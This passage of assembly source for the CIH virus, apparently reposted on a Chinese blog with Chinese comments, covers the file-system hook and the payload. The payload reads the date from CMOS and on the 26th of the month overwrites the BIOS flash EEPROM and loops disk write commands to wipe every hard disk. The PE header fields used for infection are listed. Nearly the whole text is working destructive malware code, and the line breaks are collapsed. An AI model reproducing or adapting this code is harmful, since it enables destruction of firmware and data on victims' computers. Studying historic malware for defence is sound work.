; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus ; *************************************
; * Call Previous FileSystemApiHook *
; ************************************* prevhook: popad ;恢復所有寄存器 mov eax, dr0 ; 保存的原來的文件系統鉤子程序首址 jmp [eax] ; Jump to prevhook ;跳到前一個鉤子去執行 ; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; ************************************* pIFSFunc: ; FileSystemApiHookFunction的參數見助標2mov ebx, esp ; ebx指向esp以獲得FileSystemApiHookFunction的參數地址push dword ptr [ebx+20h+04h+14h] ; Push pioreq ;把參數pioreq pir壓棧(ebx+20h+04h為參數首址) call [ebx+20h+04h] ; Call pIFSFunc ;調用pIFSFunc FSDFnAddr(FSD的功能地址) pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ;改eax的值(在棧中,20h為pushad的壓棧大小,1ch為第一個壓棧的eax) ; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h ;詳見助標2 jne QuitMyVirusFileSystemHook ; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ;保存獲得的文件時間和日期 ; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; *************************** QuitMyVirusFileSystemHook: popad ;恢復所有寄存器 ret ;從病毒設置的文件鉤子程序中退出 ; *************************************
; * Kill Computer !? ... *^_^* * ;KillComputer模塊(!!十分危險,所以原理分析及詳細注釋暫不公布!!)
; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? ;從CMOS中獲得當前的日期 IF DEBUG jmp DisableOnBusy
ELSE jnz DisableOnBusy
ENDIF ;如果是每月的26號就KillComputer(太危險了).*^_^*.; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; ************************************** ; ***************************
; * Kill BIOS EEPROM *
; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; *********************** mov di, 0058h dec edx ; and a0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; *********************** mov ah, 0e0h mov [eax], al ; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; *********************** ; or al 0h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; ***************************
; * Enable EEPROM to Write *
; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; ***************************
; * IO for EEPROM *
; *************************** IOForEEPROM:
@10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; *********************************************************
; * Static Data *
; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO ;最后一個調用的VxD的指令的地址
VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath ;各個VxD調用指令地址之差 VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;VxD的調用號
VxDCallTableSize = ($-VxDCallIDTable)/04h ;程序中使用VxD調用的個數 ; *********************************************************
; * Virus Version Copyright *
; ********************************************************* VirusVersionCopyright db 'CIH v' ;CIH病毒的標識 db MajorVirusVersion+'0' ;主版本號 db '.' db MinorVirusVersion+'0' ;副版本號 db ' TATUNG' ;作者名字 ; *********************************************************
; * Virus Size *
; ********************************************************* VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒代碼全長 ; *********************************************************
; * Dynamic Data *
; ********************************************************* VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0 ;忙標志
FileModificationTime dd ? ;文件修改時間 FileNameBuffer db FileNameBufferSize dup(?) ;7fh長的文件名數據區
@7 = FileNameBuffer DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; 塊數目
TimeDateStamp dd ? ; 文件時間
SymbolsPointer dd ? ;
NumberOfSymbols dd ? ; 符號表中符號個數
SizeOfOptionalHeader dw ? ; 可選部首長度
_Characteristics dw ? ; 信息標志
Magic dw ? ; 標志字(總是010bh)
LinkerVersion dw ? ; 連接器版本號
SizeOfCode dd ? ; 代碼段大小
SizeOfInitializedData dd ? ; 已初始化數據塊大小
SizeOfUninitializedData dd ? ; 未初始化數據塊大小
AddressOfEntryPoint dd ? ; 程序起始RVA
BaseOfCode dd ? ; 代碼段起始RVA
BaseOfData dd ? ; 數據段起始RVA
ImageBase dd ? ; 裝入基址RVA
@9 = $
SectionAlignment dd ? ; 塊對齊
FileAlignment dd ? ; 文件塊對齊
OperatingSystemVersion dd ? ; 所需操作系統版本號
ImageVersion dd ? ; 用戶自定義版本號
SubsystemVersion dd ? ; 所需子系統版本號
Reserved dd ? ; 保留
SizeOfImage dd ? ; 文件各部分總長
SizeOfHeaders dd ? ; 部首及塊表大小
SizeOfImageHeaderToRead = $-NumberOfSections ; ;
NewAddressOfEntryPoint = DataBuffer ; DWORD ;
SizeOfImageHeaderToWrite = 04h ; StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD ; 塊名
VirtualSize = StartOfSectionTable+08h ; DWORD ; 該段真實長度
VirtualAddress = StartOfSectionTable+0ch ; DWORD ; 該塊的RVA
SizeOfRawData = StartOfSectionTable+10h ; DWORD ; 該塊物理長度
PointerToRawData = StartOfSectionTable+14h ; DWORD ; 該塊物理偏移
PointerToRelocations = StartOfSectionTable+18h ; DWORD ; 重定位的偏移
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD ; 行號表的偏移
NumberOfRelocations = StartOfSectionTable+20h ; WORD ; 重定位項數目
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD ; 行號表的數目
Characteristics = StartOfSectionTable+24h ; DWORD ; 塊屬性
SizeOfScetionTable = Characteristics+04h-SectionName ; 塊表項的長度 ; *********************************************************
; * Virus Total Need Memory *
; ********************************************************* VirusNeedBaseMemory = $ VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒所需的內存(病毒全長) ; *********************************************************
; ********************************************************* VirusGame ENDS END FileHeader ;病毒全文完
?
總結
以上是生活随笔為你收集整理的CIH病毒-邹丹注释的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 安全合规--48--基于国内法律法规的企
- 下一篇: 通过命令行脚本实现双网卡切换